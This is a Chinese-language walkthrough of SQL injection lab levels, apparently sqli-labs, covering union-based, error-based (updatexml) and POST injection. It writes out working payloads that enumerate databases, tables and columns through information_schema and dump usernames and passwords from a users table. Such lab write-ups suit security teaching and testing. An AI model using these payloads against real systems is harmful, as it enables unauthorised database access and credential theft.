查询步骤：闭合-注释符-查询数据库-查询表-查询字段 

第一关：联合查询

提示请输入你的id：

首先sql注入输入的数据都是合理的查询语句。产生原因是由于没有对用户的输入做过滤，导致意外的查询语句进入到了程序中，查询到了本不应该查询到的数据。

尝试闭合，加上   '   后可以发现报错，说明闭合成功，再加入注释符号，使后面的程序不生效，mysql的注释符号有三种：--空格   #   /***/  ；使用--+ 的原因是，在url中，+ 会被解析为空格，而直接加空格会被忽略；

接下来就可以构造查询语句：

首先查询表的列数：使用  order by 排序，默认正序，在使用4排序时报错，说明表只有3个（一个一个试）

使用联合查询：用select查询前三个字段，目的是为了知道哪几个字段在前端显示，这样我们可以将想要查询的数据将前端显示的字段替换掉；id为-1，是因为源码只显示一列，所以让id为假，就可以显示第二列；最终目的是找到管理员密码和账号；

?id=-1' union select 1,2,3 --+ 

 查询database()可以看到当前是security库，

?id=-1' union select 1,database(),3 --+

  mysql5.0以上的版本有information_schema库，information_schema库中有我们所需要的表名与库名。我们先查询security数据库中的所有表的名字，并以一行输出的方式输出，因为如果不一行输出的话，前端只会显示查询的第一个表名。 

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+  

现在我们知道了security数据库中的所有表名，我们需要查询password和username，通常情况下这些数据都会存储到users中，所以我们现在查询users这个表中的所有字段的名字是什么。

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+  

可以看到users表下有username,password,

?id=-1' union select 1,2,group_concat( username,id,password) from users --+

第五关：报错注入

第五关没有发现显示位，但是有报错信息，尝试使用报错注入

尝试跟第一关一样直接查发现显示 ，0x7e 的意思是 ~

?id=1' and updatexml(1,concat(0x7e,(select username password from users)),1)--+

 因为updatexml有限制，只显示32位，所以只能使用substr截取32位显示，使用group_concat函数将输出的数据连接起来显示

?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password)from users),1,32),0x7e),1)--+

第十一关：POST注入、无限制

还是先尝试加 ’  

和前面的注入一样有报错信息 ,因为不使用url注入，所以将 --+ 改为 #

a'and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password)from users),1,32),0x7e),1)# 

...................................